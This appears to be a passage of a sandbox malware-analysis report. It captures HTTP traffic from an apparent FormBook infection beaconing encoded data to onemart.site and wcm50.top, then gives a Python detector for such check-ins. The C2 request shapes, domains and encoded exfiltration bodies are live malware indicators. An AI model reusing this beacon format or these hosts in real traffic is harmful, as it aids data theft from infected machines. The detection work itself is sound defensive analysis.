Nov 5, 2024 15:23:20.484649897 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61
Data Ascii: </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button>
Nov 5, 2024 15:23:20.485023022 CET | 1236 | IN | Data Raw: 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 20 61 63 74 69 76 65 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 3e 50 61 67 65 73 3c 2f 61 3e 0d 0a 20 20 20
Data Ascii: " class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial<
Nov 5, 2024 15:23:20.485035896 CET | 1236 | IN | Data Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 61 67 65 73 3c 2f 61 3e 3c 2f
Data Ascii: > <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">404 Error</li> </ol>
Nov 5, 2024 15:23:20.485045910 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 31 22 3e 50 72 6f 70 65 72 74 79 20 54 79 70 65 20 31 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: <option value="1">Property Type 1</option> <option value="2">Property Type 2</option> <option value="3">Property Type 3</option>
Nov 5, 2024 15:23:20.485805988 CET | 1236 | IN | Data Raw: 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 74 65 78 74 2d 63 65 6e 74 65 72 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6a 75 73 74 69 66 79 2d 63
Data Ascii: <div class="container text-center"> <div class="row justify-content-center"> <div class="col-lg-6"> <i class="bi bi-exclamation-triangle display-1 text-primary"></i>
Nov 5, 2024 15:23:20.485819101 CET | 36 | IN | Data Raw: 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 70 68 6f 6e 65 2d 61 6c 74 20 6d 65 2d 33 22 3e 3c 2f 69
Data Ascii: ><i class="fa fa-phone-alt me-3"></i
Nov 5, 2024 15:23:20.485833883 CET | 1236 | IN | Data Raw: 3e 2b 30 31 32 20 33 34 35 20 36 37 38 39 30 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 20 63 6c 61 73 73 3d 22 6d 62 2d 32 22 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 65 6e 76 65 6c
Data Ascii: >+012 345 67890</p> <p class="mb-2"><i class="fa fa-envelope me-3"></i>info@example.com</p> <div class="d-flex pt-2"> <a class="btn btn-outline-light btn-social" hr
Nov 5, 2024 15:23:20.485846043 CET | 1236 | IN | Data Raw: 66 3d 22 22 3e 54 65 72 6d 73 20 26 20 43 6f 6e 64 69 74 69 6f 6e 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63
Data Ascii: f="">Terms & Condition</a> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Photo Gallery</h5> <div class="row g-2 pt-2">
Nov 5, 2024 15:23:20.489850998 CET | 1236 | IN | Data Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 69 6d 67 2d 66 6c 75 69 64 20 72 6f 75 6e 64 65 64
Data Ascii: <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-6.jpg" alt=""> </div> </div> </div>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 55578 | 209.74.95.29 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:23:22.345351934 CET | 816 | OUT | POST /frpa/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.onemart.site
Origin: http://www.onemart.site
Connection: close
Content-Length: 220
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Referer: http://www.onemart.site/frpa/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 37 36 69 66 41 73 73 2f 6f 70 44 71 62 30 6d 6e 4f 6c 46 6b 63 6e 70 59 41 76 71 79 48 61 52 2f 55 4b 4a 53 4d 35 53 47 47 4e 41 6f 41 48 53 70 50 58 4a 64 5a 36 66 54 7a 74 6d 56 74 2b 44 67 54 62 59 30 38 7a 56 58 76 34 38 6b 50 6c 6a 5a 59 49 2b 41 5a 2f 6b 6f 6a 39 50 41 6a 64 66 41 52 57 39 58 33 38 4b 43 4b 79 71 4e 74 54 53 73 53 45 58 63 47 6c 75 75 35 74 73 66 45 35 77 42 67 4c 62 42 64 52 50 72 41 44 4d 2f 4a 47 62 49 30 78 45 4e 41 4b 64 54 52 57 72 6a 51 62 62 33 30 77 37 51 4f 36 4a 6f 72 39 49 65 44 50 6e 71 6b 2f 51 45 2f 4e 74 7a 44 58 55 4b 79 70 69 65 32 6f 41 4d 72 63 5a 33 2b 67 6f 77 57 65 39 4c 6a 37 4c 2b 77 62 73 3d
                                                                            Data Ascii: zhl=76ifAss/opDqb0mnOlFkcnpYAvqyHaR/UKJSM5SGGNAoAHSpPXJdZ6fTztmVt+DgTbY08zVXv48kPljZYI+AZ/koj9PAjdfARW9X38KCKyqNtTSsSEXcGluu5tsfE5wBgLbBdRPrADM/JGbI0xENAKdTRWrjQbb30w7QO6Jor9IeDPnqk/QE/NtzDXUKypie2oAMrcZ3+gowWe9Lj7L+wbs=
Nov 5, 2024 15:23:23.026525021 CET | 1236 | IN | HTTP/1.1 404 Not Found
Date: Tue, 05 Nov 2024 14:23:22 GMT
Server: Apache
Content-Length: 13928
Connection: close
Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
Nov 5, 2024 15:23:23.026648045 CET | 212 | IN | Data Raw: 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65
Data Ascii: " rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet">
Nov 5, 2024 15:23:23.026660919 CET | 1236 | IN | Data Raw: 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 2d 78 78 6c 20 62 67 2d 77 68 69 74 65 20 70 2d 30 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 53 70 69
Data Ascii: </head><body> <div class="container-xxl bg-white p-0"> ... Spinner Start --> <div id="spinner" class="show bg-white position-fixed translate-middle w-100 vh-100 top-50 start-50 d-flex align-items-center justify-con
Nov 5, 2024 15:23:23.026921034 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6c 61 70 73 65 20 6e 61 76 62 61 72 2d 63 6f 6c 6c 61 70 73 65 22 20 69 64 3d 22 6e 61 76 62 61
Data Ascii: </button> <div class="collapse navbar-collapse" id="navbarCollapse"> <div class="navbar-nav ms-auto"> <a href="index.html" class="nav-item nav-link">Home</a>
Nov 5, 2024 15:23:23.026936054 CET | 1236 | IN | Data Raw: 73 73 3d 22 64 72 6f 70 64 6f 77 6e 2d 69 74 65 6d 22 3e 54 65 73 74 69 6d 6f 6e 69 61 6c 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 34 30 34 2e 68
Data Ascii: ss="dropdown-item">Testimonial</a> <a href="404.html" class="dropdown-item active">404 Error</a> </div> </div> <a href="contact.htm
Nov 5, 2024 15:23:23.026949883 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 3c 2f 6f 6c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6e 61 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: </ol> </nav> </div> <div class="col-md-6 animated fadeIn"> <img class="img-fluid" src="img/header.jpg" alt=""> </div> </div>
Nov 5, 2024 15:23:23.027790070 CET | 1236 | IN | Data Raw: 20 33 3c 2f 6f 70 74 69 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 73 65 6c 65 63 74 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: 3</option> </select> </div> <div class="col-md-4"> <select class="form-select border-0 py-3">
Nov 5, 2024 15:23:23.027806044 CET | 1236 | IN | Data Raw: 31 20 74 65 78 74 2d 70 72 69 6d 61 72 79 22 3e 3c 2f 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 64 69 73 70 6c 61 79 2d 31 22 3e 34 30 34 3c 2f 68 31 3e 0d 0a 20 20 20 20
Data Ascii: 1 text-primary"></i> <h1 class="display-1">404</h1> <h1 class="mb-4">Page Not Found</h1> <p class="mb-4">Were sorry, the page you have looked for does not exist in o
Nov 5, 2024 15:23:23.027820110 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 63 6c 61 73 73 3d 22 62 74 6e 20 62 74 6e 2d 6f 75 74 6c 69 6e 65 2d 6c 69 67 68 74 20 62 74 6e 2d 73 6f 63 69 61 6c 22 20 68 72 65 66 3d 22 22 3e 3c 69 20 63 6c 61 73 73 3d
Data Ascii: <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-twitter"></i></a> <a class="btn btn-outline-light btn-social" href=""><i class="fab fa-facebook-f"></i></a>
Nov 5, 2024 15:23:23.028564930 CET | 1236 | IN | Data Raw: 68 35 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 67 2d 32 20 70 74 2d 32 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
Data Ascii: h5> <div class="row g-2 pt-2"> <div class="col-4"> <img class="img-fluid rounded bg-light p-1" src="img/property-1.jpg" alt="">
Nov 5, 2024 15:23:23.031691074 CET | 1236 | IN | Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d
Data Ascii: </div> </div> <div class="col-lg-3 col-md-6"> <h5 class="text-white mb-4">Newsletter</h5> <p>Dolor amet sit justo amet elitr clita ipsum


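The sessions above share one shape: a GET to a short single-directory path with an encoded blob as the first query parameter and a junk second parameter, then POSTs to the same kind of path carrying the same parameter name (zhl) in a form body, all sent with Connection: close, a Referer that is the POST target itself, and one Android Mobile Safari User-Agent, while the process walks a list of unrelated domains resolved a few seconds apart. The servers answer 404 either way, so the response is no help; the request shape and the reuse of the parameter name across hosts are what to detect on. The Python below is an added example written for this report, not Joe Sandbox code and not part of the sample: it scores HTTP request records against those traits and looks for a parameter name reused by flagged requests to more than one host. The records in SAMPLE_REQUESTS are constructed from sessions 0 and 1 above plus two benign controls; the record layout, the 3 to 8 character path width, the 40 character blob length and the alert threshold are assumptions of this example, not a published FormBook specification.

```python
"""Flag FormBook-style HTTP check-ins in request logs.

Added example for this report; not Joe Sandbox code. SAMPLE_REQUESTS is
constructed from the sessions captured above plus two benign controls. The
record layout (method, uri, host, headers, body), the path width, the blob
length and the alert threshold are this example's own assumptions.
"""
import re
from urllib.parse import urlsplit

# User-Agent sent in every request of this sample. Treated as a weak signal
# only: other builds use other strings, and real Android browsers send it too.
SAMPLE_UA = ("Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) "
             "AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30")

# Assumption: the check-in path is one short lowercase alphanumeric directory
# ("/4snq/", "/frpa/" above). The 3..8 width is a guess; widen it on misses.
SHORT_DIR_RE = re.compile(r"^/[a-z0-9]{3,8}/$")
# Encoded payload: base64 alphabet, never percent-encoded, 40+ characters.
BLOB_RE = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


def split_form(data):
    """Split k=v&k=v by hand: urllib.parse.parse_qsl would turn '+' into ' '
    and corrupt the base64 blobs we want to inspect."""
    pairs = []
    for part in data.split("&"):
        if part:
            key, _, value = part.partition("=")
            pairs.append((key, value))
    return pairs


def score_request(method, uri, host, headers, body=""):
    """Return (score, reasons); one point per matching trait."""
    reasons = []
    parts = urlsplit(uri)
    params = split_form(parts.query if method == "GET" else body)
    if SHORT_DIR_RE.match(parts.path):
        reasons.append("short-dir-path")
    if params and BLOB_RE.match(params[0][1]):
        reasons.append("base64-blob-first-param")
    if method == "GET" and len(params) == 2 and len(params[1][1]) <= 16:
        reasons.append("trailing-junk-param")        # e.g. X8Rx1=znhhIbB8nN
    if headers.get("Connection", "").lower() == "close":
        reasons.append("connection-close")
    if method == "POST" and headers.get("Referer") == f"http://{host}{parts.path}":
        reasons.append("self-referer")               # Referer is the POST target itself
    if headers.get("User-Agent") == SAMPLE_UA:
        reasons.append("sample-ua")
    return len(reasons), reasons


def shared_param_key(records, threshold=3):
    """Name of the first parameter reused by flagged requests to more than one
    host, or None. One implant walking its domain list keeps the same key
    ("zhl" above) for every host; unrelated sites do not."""
    hosts_by_key = {}
    for method, uri, host, headers, body in records:
        score, _ = score_request(method, uri, host, headers, body)
        if score < threshold:
            continue
        params = split_form(urlsplit(uri).query if method == "GET" else body)
        if params:
            hosts_by_key.setdefault(params[0][0], set()).add(host)
    for key, hosts in hosts_by_key.items():
        if len(hosts) > 1:
            return key
    return None


_C2_HEADERS = {"Connection": "close", "User-Agent": SAMPLE_UA}
# Constructed from sessions 0 and 1 above; the last two records are benign controls.
SAMPLE_REQUESTS = [
    ("GET", "/4snq/?zhl=sdH/WbEy6w4fbVGTq9TqooXc2+84tGl6rFb6/eES0khOL/XioS6AKYaJ1BDLndLagFW2QAKxeq+tE1rAXqYu5rfm3z/1IJXzLuu54LPR0VmTOFYhtf9kUlg=&X8Rx1=znhhIbB8nN",
     "www.wcm50.top", dict(_C2_HEADERS), ""),
    ("POST", "/frpa/", "www.onemart.site",
     dict(_C2_HEADERS, Origin="http://www.onemart.site",
          Referer="http://www.onemart.site/frpa/",
          **{"Content-Type": "application/x-www-form-urlencoded"}),
     "zhl=76ifAss/opDqdkWnIF5kaHpZMPqyO6R7UKFSM7/dG/koBmipOURda6fTn9mQzOD/TbU88ypXv8UkPlTZf5+DYvk9l9PCndfARW9X38u7KyyNtiisdGzdLFup+tsfVpxGgLbodQTBAA0/JD/I0k4MaadVVWqXdqmN2QuxEJ9O054SPp2w1OxTtNJAeQd+/qfXtg=="),
    ("GET", "/search?q=real+estate", "www.example.com",
     {"Connection": "keep-alive", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64) Firefox/130.0"}, ""),
    ("POST", "/login", "intranet.example",
     {"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://intranet.example/"},
     "user=alice&password=hunter2"),
]

if __name__ == "__main__":
    for rec in SAMPLE_REQUESTS:
        score, why = score_request(*rec)
        print(f"{score} {rec[0]:4} {rec[2]:18} {' '.join(why)}")
    print("shared key:", shared_param_key(SAMPLE_REQUESTS))
```

Both captured requests score 5 of 6 and the controls score 0; the cross-host check is the part worth keeping even if you loosen the per-request traits, because a single infected host talking to several throwaway domains with one parameter name is hard to produce by accident. Feed it proxy or Zeek http.log records mapped onto the same tuple, and treat "sample-ua" as corroboration rather than a trigger.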
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 55594 | 209.74.95.29 | 80 | 4324 | C:\Program Files (x86)\FPSlWiAePxLOVMTvbhsJClngwkCztVZgwvKMCWnmkWfzAabDJavQudgNdRFIFHrkZ\fZXsbVktlmkz.exe
Timestamp | Bytes transferred | Direction | Data
Nov 5, 2024 15:23:24.890872002 CET | 10898 | OUT | POST /frpa/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.onemart.site
Origin: http://www.onemart.site
Connection: close
Content-Length: 10300
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Referer: http://www.onemart.site/frpa/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; SGH-T889 Build/JSS15J) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
                                                                            Data Raw: 7a 68 6c 3d 37 36 69 66 41 73 73 2f 6f 70 44 71 62 30 6d 6e 4f 6c 46 6b 63 6e 70 59 41 76 71 79 48 61 52 2f 55 4b 4a 53 4d 35 53 47 47 4e 49 6f 41 78 47 70 4f 32 4a 64 59 36 66 54 77 74 6d 55 74 2b 43 36 54 62 41 77 38 7a 5a 74 76 36 30 6b 41 6d 72 5a 64 38 69 41 4d 76 6b 6f 68 39 50 42 6e 64 66 77 52 57 74 62 33 38 61 43 4b 79 71 4e 74 51 4b 73 62 32 7a 63 56 31 75 70 2b 74 73 44 56 70 78 6d 67 4b 7a 77 64 52 4c 52 41 53 73 2f 4f 6d 4c 49 33 44 73 4e 59 61 64 52 64 32 72 37 51 62 58 53 30 77 6e 36 4f 36 4e 53 72 36 34 65 54 75 43 38 7a 4d 34 4c 6a 73 6b 71 42 6d 6b 5a 39 34 2b 46 37 71 38 30 73 39 64 30 74 44 63 6e 59 4d 6b 6e 37 4c 79 36 74 63 4e 66 42 33 2b 38 6c 34 38 46 4e 49 64 37 4b 4c 48 36 62 68 57 58 49 33 66 43 30 45 42 61 50 69 66 36 67 55 71 43 33 74 69 6e 79 4c 50 71 46 42 68 6f 48 4a 42 30 72 6d 50 34 49 33 58 6e 6f 4a 34 6e 75 66 72 33 6d 4b 39 47 43 4c 51 66 50 49 6d 64 34 4b 71 4b 6c 30 6d 4b 38 6b 4c 78 53 36 58 69 79 33 70 54 47 61 6d 57 72 44 35 75 30 70 32 31 34 6c 30 7a 59 41 [TRUNCATED]
                                                                            Data Ascii: zhl=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 [TRUNCATED]
                                                                            Nov 5, 2024 15:23:25.564204931 CET1236INHTTP/1.1 404 Not Found
                                                                            Date: Tue, 05 Nov 2024 14:23:25 GMT
                                                                            Server: Apache
                                                                            Content-Length: 13928
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <title>Makaan - Real Estate HTML Template</title> <meta content="width=device-width, initial-scale=1.0" name="viewport"> <meta content="" name="keywords"> <meta content="" name="description"> ... Favicon --> <link href="img/favicon.ico" rel="icon"> ... Google Web Fonts --> <link rel="preconnect" href="https://fonts.googleapis.com"> <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin> <link href="https://fonts.googleapis.com/css2?family=Heebo:wght@400;500;600&family=Inter:wght@700;800&display=swap" rel="stylesheet"> ... Icon Font Stylesheet --> <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.10.0/css/all.min.css" rel="stylesheet"> <link href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.4.1/font/bootstrap-icons.css" rel="stylesheet"> ... Libraries Stylesheet --> <link href="lib/animate/animate.min.css" [TRUNCATED]
                                                                            Nov 5, 2024 15:23:25.564311028 CET1236INData Raw: 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 43 75 73 74 6f 6d 69 7a 65 64 20 42 6f 6f 74 73 74 72 61 70 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65
                                                                            Data Ascii: " rel="stylesheet"> ... Customized Bootstrap Stylesheet --> <link href="css/bootstrap.min.css" rel="stylesheet"> ... Template Stylesheet --> <link href="css/style.css" rel="stylesheet"></head><body> <div cl
                                                                            Nov 5, 2024 15:23:25.564326048 CET1236INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 6e 61 76 62 61 72 2d 74 6f 67 67 6c 65 72 22 20 64 61
                                                                            Data Ascii: </a> <button type="button" class="navbar-toggler" data-bs-toggle="collapse" data-bs-target="#navbarCollapse"> <span class="navbar-toggler-icon"></span> </button>
                                                                            Nov 5, 2024 15:23:25.564815044 CET1236INData Raw: 22 20 63 6c 61 73 73 3d 22 6e 61 76 2d 6c 69 6e 6b 20 64 72 6f 70 64 6f 77 6e 2d 74 6f 67 67 6c 65 20 61 63 74 69 76 65 22 20 64 61 74 61 2d 62 73 2d 74 6f 67 67 6c 65 3d 22 64 72 6f 70 64 6f 77 6e 22 3e 50 61 67 65 73 3c 2f 61 3e 0d 0a 20 20 20
                                                                            Data Ascii: " class="nav-link dropdown-toggle active" data-bs-toggle="dropdown">Pages</a> <div class="dropdown-menu rounded-0 m-0"> <a href="testimonial.html" class="dropdown-item">Testimonial<
                                                                            Nov 5, 2024 15:23:25.564829111 CET848INData Raw: 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 62 72 65 61 64 63 72 75 6d 62 2d 69 74 65 6d 22 3e 3c 61 20 68 72 65 66 3d 22 23 22 3e 50 61 67 65 73 3c 2f 61 3e 3c 2f
                                                                            Data Ascii: > <li class="breadcrumb-item"><a href="#">Pages</a></li> <li class="breadcrumb-item text-body active" aria-current="page">404 Error</li> </ol>
                                                                            Nov 5, 2024 15:23:25.565268993 CET1236INData Raw: 73 3d 22 63 6f 6c 2d 6d 64 2d 34 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74
                                                                            Data Ascii: s="col-md-4"> <input type="text" class="form-control border-0 py-3" placeholder="Search Keyword"> </div> <div class="col-md-4">
